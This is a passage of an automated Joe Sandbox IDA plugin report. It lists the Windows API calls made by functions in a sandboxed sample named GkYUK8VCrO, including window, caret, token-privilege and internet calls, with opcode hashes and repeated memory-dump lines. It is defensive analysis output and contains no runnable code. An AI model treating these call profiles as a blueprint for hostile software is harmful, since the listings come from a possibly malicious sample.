                                • GetForegroundWindow.USER32 ref: 00B25189
                                  • Part of subcall function 00B0387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B03897
                                  • Part of subcall function 00B0387D: GetCurrentThreadId.KERNEL32 ref: 00B0389E
                                  • Part of subcall function 00B0387D: AttachThreadInput.USER32(00000000,?,00B052A7), ref: 00B038A5
                                • GetCaretPos.USER32(?), ref: 00B2519A
                                • ClientToScreen.USER32(00000000,?), ref: 00B251D5
                                • GetForegroundWindow.USER32 ref: 00B251DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                • String ID:
                                • API String ID: 2759813231-0
                                • Opcode ID: d61e35e4e64b5a919eaf7e65f57c8895bd0340571b87e65210f028751bc2350c
                                • Instruction ID: 2a66e195e472431bc8b766094b9a0de20b7523d58470acf94ebece130f0fe240
                                • Opcode Fuzzy Hash: d61e35e4e64b5a919eaf7e65f57c8895bd0340571b87e65210f028751bc2350c
                                • Instruction Fuzzy Hash: 55311071A00108AFDB10EFA5C9859EFB7FDEF99300F10406AE415E7251EB759E45CBA0
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • GetCursorPos.USER32(?), ref: 00B2C7C2
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00ADBBFB,?,?,?,?,?), ref: 00B2C7D7
                                • GetCursorPos.USER32(?), ref: 00B2C824
                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00ADBBFB,?,?,?), ref: 00B2C85E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                • String ID:
                                • API String ID: 2864067406-0
                                • Opcode ID: 2446ac0f6346d9db876d7a135082f0b4a5a917c0b799880a4e0597eb9a35ce44
                                • Instruction ID: d67faf4443ea09a7ba785884e8dd1e97fcc5228a8d539d634368deda13a43acd
                                • Opcode Fuzzy Hash: 2446ac0f6346d9db876d7a135082f0b4a5a917c0b799880a4e0597eb9a35ce44
                                • Instruction Fuzzy Hash: 36314135500028AFDB25CF58D898EFE7FF6EB49710F0441A5F9098B2A1C7355D51DBA0
                                APIs
                                  • Part of subcall function 00AF8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8669
                                  • Part of subcall function 00AF8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8673
                                  • Part of subcall function 00AF8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8682
                                  • Part of subcall function 00AF8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8689
                                  • Part of subcall function 00AF8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF869F
                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AF8BEB
                                • _memcmp.LIBCMT ref: 00AF8C0E
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AF8C44
                                • HeapFree.KERNEL32(00000000), ref: 00AF8C4B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                • String ID:
                                • API String ID: 1592001646-0
                                • Opcode ID: feb5d08c1c18a4d4a239851da0c52796104ae8617fd98c29fc54768bec876cc4
                                • Instruction ID: 7000e56fd90ce72a0554b69f2d2c64b577a0c84d161ee415e5fc4bd6dec70992
                                • Opcode Fuzzy Hash: feb5d08c1c18a4d4a239851da0c52796104ae8617fd98c29fc54768bec876cc4
                                • Instruction Fuzzy Hash: 0C216971E0120DABDB10DFE4C945BBEB7B8EF44355F154069E654AB240DB39AA06CB60
                                APIs
                                • __setmode.LIBCMT ref: 00AC0BF2
                                  • Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07B20,?,?,00000000), ref: 00AA5B8C
                                  • Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07B20,?,?,00000000,?,?), ref: 00AA5BB0
                                • _fprintf.LIBCMT ref: 00AC0C29
                                • OutputDebugStringW.KERNEL32(?), ref: 00AF6331
                                  • Part of subcall function 00AC4CDA: _flsall.LIBCMT ref: 00AC4CF3
                                • __setmode.LIBCMT ref: 00AC0C5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                • String ID:
                                • API String ID: 521402451-0
                                • Opcode ID: be7398d92894fb4d2dcc79c5f87df2b40904f3265367614810ce08958aad899f
                                • Instruction ID: fe7df2c3532ed4beede6be8c4812b4dcbaf67a2f8834bcbb07440c76e5e80420
                                • Opcode Fuzzy Hash: be7398d92894fb4d2dcc79c5f87df2b40904f3265367614810ce08958aad899f
                                • Instruction Fuzzy Hash: 41115932908208BBCB04B7B49D43EBEBB6C9F4A320F14015EF204971D2EF315D568799
                                APIs
                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B11A97
                                  • Part of subcall function 00B11B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B11B40
                                  • Part of subcall function 00B11B21: InternetCloseHandle.WININET(00000000), ref: 00B11BDD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Internet$CloseConnectHandleOpen
                                • String ID:
                                • API String ID: 1463438336-0
                                • Opcode ID: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
                                • Instruction ID: e764fbfc21053b9443969d8435b7090433626990d25877b8f313d9cc90f9c4d1
                                • Opcode Fuzzy Hash: b3402b37302e0074ad2be3ebdbbf0d8af231cad43cfef032fc11868dac4d369e
                                • Instruction Fuzzy Hash: 4021C235204601BFDB119F648C40FFBBBFDFF44700F50046AFA5196560EB31986197A0
                                APIs
                                  • Part of subcall function 00AFF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00AFE1C4,?,?,?,00AFEFB7,00000000,000000EF,00000119,?,?), ref: 00AFF5BC
                                  • Part of subcall function 00AFF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00AFF5E2
                                  • Part of subcall function 00AFF5AD: lstrcmpiW.KERNEL32(00000000,?,00AFE1C4,?,?,?,00AFEFB7,00000000,000000EF,00000119,?,?), ref: 00AFF613
                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00AFEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE1DD
                                • lstrcpyW.KERNEL32(00000000,?), ref: 00AFE203
                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00AFEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00AFE237
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: lstrcmpilstrcpylstrlen
                                • String ID: cdecl
                                • API String ID: 4031866154-3896280584
                                • Opcode ID: 0f272654b26ee7013c3eb160877d3b536e6fc6583541187fc90e78438b3867c9
                                • Instruction ID: e00d6d168f5797c2148523bc415fff396e490a3a38420d1603d0e678e906eedd
                                • Opcode Fuzzy Hash: 0f272654b26ee7013c3eb160877d3b536e6fc6583541187fc90e78438b3867c9
                                • Instruction Fuzzy Hash: 7A117F36200349EFCB25AFA4D845EBA77B8FF85750B40402AF906CB264FB71985197A0
                                APIs
                                • _free.LIBCMT ref: 00AD5351
                                  • Part of subcall function 00AC594C: __FF_MSGBANNER.LIBCMT ref: 00AC5963
                                  • Part of subcall function 00AC594C: __NMSG_WRITE.LIBCMT ref: 00AC596A
                                  • Part of subcall function 00AC594C: RtlAllocateHeap.NTDLL(01110000,00000000,00000001,00000000,?,?,?,00AC1013,?), ref: 00AC598F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: AllocateHeap_free
                                • String ID:
                                • API String ID: 614378929-0
                                • Opcode ID: 329aa2bc5fd3f021d04378a2cd10158808c0b153a1009b3c6e1f358ad92694cb
                                • Instruction ID: 8009eaf2cc283395b63ec793119723523a811fee6a8f6545137c4da49bec2a7b
                                • Opcode Fuzzy Hash: 329aa2bc5fd3f021d04378a2cd10158808c0b153a1009b3c6e1f358ad92694cb
                                • Instruction Fuzzy Hash: F711C432D04A15AFCF312F70A924B6937A46F107E0B11442FF9079E290DFB9C9418790
                                APIs
                                • _memset.LIBCMT ref: 00AA4560
                                  • Part of subcall function 00AA410D: _memset.LIBCMT ref: 00AA418D
                                  • Part of subcall function 00AA410D: _wcscpy.LIBCMT ref: 00AA41E1
                                  • Part of subcall function 00AA410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA41F1
                                • KillTimer.USER32(?,00000001,?,?), ref: 00AA45B5
                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA45C4
                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ADD6CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                • String ID:
                                • API String ID: 1378193009-0
                                • Opcode ID: 26fbf4a19e8de6dcd1a3ac4da5e0c48240afd0e013c9806a77038f57594c86d3
                                • Instruction ID: 5d9d42a2a22d50f2385dfb4bed85b010862db979dca59c2339f2a5ed106ccc2f
                                • Opcode Fuzzy Hash: 26fbf4a19e8de6dcd1a3ac4da5e0c48240afd0e013c9806a77038f57594c86d3
                                • Instruction Fuzzy Hash: 5221C870904784AFEB328B24D855BE7BBFC9F45304F04009EE69E57285C7B45E858B91
                                APIs
                                  • Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07B20,?,?,00000000), ref: 00AA5B8C
                                  • Part of subcall function 00AA5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07B20,?,?,00000000,?,?), ref: 00AA5BB0
                                • gethostbyname.WSOCK32(?,?,?), ref: 00B166AC
                                • WSAGetLastError.WSOCK32(00000000), ref: 00B166B7
                                • _memmove.LIBCMT ref: 00B166E4
                                • inet_ntoa.WSOCK32(?), ref: 00B166EF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                • String ID:
                                • API String ID: 1504782959-0
                                • Opcode ID: d69401ef3caf29a42f49c4435341f5799fa83c3a654aa9ad03a982e169fbc7b1
                                • Instruction ID: 030f0702a7e8bb4d03e79efc25631ca9686f3f87f5d615324ac7d32fc9594431
                                • Opcode Fuzzy Hash: d69401ef3caf29a42f49c4435341f5799fa83c3a654aa9ad03a982e169fbc7b1
                                • Instruction Fuzzy Hash: FE112E35900509AFCB05EBA4DE86DEEB7B8AF19310B144065F506A71A1EF31AE44DBA1
                                APIs
                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AF9043
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF9055
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF906B
                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AF9086
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
                                • Instruction ID: 662555b58251af27d588f171bd4deefad2d6498a0731a3e3724aa9cec42ccbab
                                • Opcode Fuzzy Hash: 38f35b5fbea113b0ba1757f5fdf172e2d973f2866129d2109a9ad9f4a6fc8482
                                • Instruction Fuzzy Hash: 15114C79900218FFDB11DFA5C984FAEBB74FB48310F2040A5FA04B7250DA726E10DB90
                                APIs
                                  • Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623
                                • DefDlgProcW.USER32(?,00000020,?), ref: 00AA12D8
                                • GetClientRect.USER32(?,?), ref: 00ADB84B
                                • GetCursorPos.USER32(?), ref: 00ADB855
                                • ScreenToClient.USER32(?,?), ref: 00ADB860
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Client$CursorLongProcRectScreenWindow
                                • String ID:
                                • API String ID: 4127811313-0
                                • Opcode ID: a44658b10d23e2f8f76299fe682449bafb0ebf400da101e6fbccdcc4edf89f37
                                • Instruction ID: ef5fe6fab40cd4662fe736620da5a1bc0b742144356f98c775c7f2f5997db9c5
                                • Opcode Fuzzy Hash: a44658b10d23e2f8f76299fe682449bafb0ebf400da101e6fbccdcc4edf89f37
                                • Instruction Fuzzy Hash: D1110A3990011ABFCB11DFA8D985AFE77B8EB06301F100466F911E7291CB34BA56DBA5
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B0166F
                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B01694
                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B0169E
                                • Sleep.KERNEL32(?,?,?,?,?,?,?,00B001FD,?,00B01250,?,00008000), ref: 00B016D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CounterPerformanceQuerySleep
                                • String ID:
                                • API String ID: 2875609808-0
                                • Opcode ID: d50762d3d147aa6a1aea381e1ad42bb30969ece5d0b1a61d1f700fac5562a178
                                • Instruction ID: cc2455dad5a550c5e46bb84aee9faf53c9ef69b4428d3cce0620ddfd5dfa310d
                                • Opcode Fuzzy Hash: d50762d3d147aa6a1aea381e1ad42bb30969ece5d0b1a61d1f700fac5562a178
                                • Instruction Fuzzy Hash: 58115A31C0051DEBCF049FA9DD88AFEBFB8FF09742F4544A9E940B2280CB3155619B96
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                • String ID:
                                • API String ID: 3016257755-0
                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                • Instruction ID: eeef2973ef3df550d85b3226ca3ebb3214436a41ce3fef5c41194272b8117bb1
                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                • Instruction Fuzzy Hash: CF01807204418ABBCF1A5F84CC028EE3F22BF19340B488616FA1958231E237C9B1AB81
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 00B2B59E
                                • ScreenToClient.USER32(?,?), ref: 00B2B5B6
                                • ScreenToClient.USER32(?,?), ref: 00B2B5DA
                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B2B5F5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: ClientRectScreen$InvalidateWindow
                                • String ID:
                                • API String ID: 357397906-0
                                • Opcode ID: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
                                • Instruction ID: d07d11620d25818a092f0d36234531cba0e6540de41238df4e1f2c8cbc988a50
                                • Opcode Fuzzy Hash: f553507cfa63363f4b0c314580f83870c27647b1a600db8195804708ac89e7fa
                                • Instruction Fuzzy Hash: 621134B5D0020AEFDB51CF99D4449EEBBF5FB18310F104166E914E3620D735AA55CF50
                                APIs
                                • _memset.LIBCMT ref: 00B2B8FE
                                • _memset.LIBCMT ref: 00B2B90D
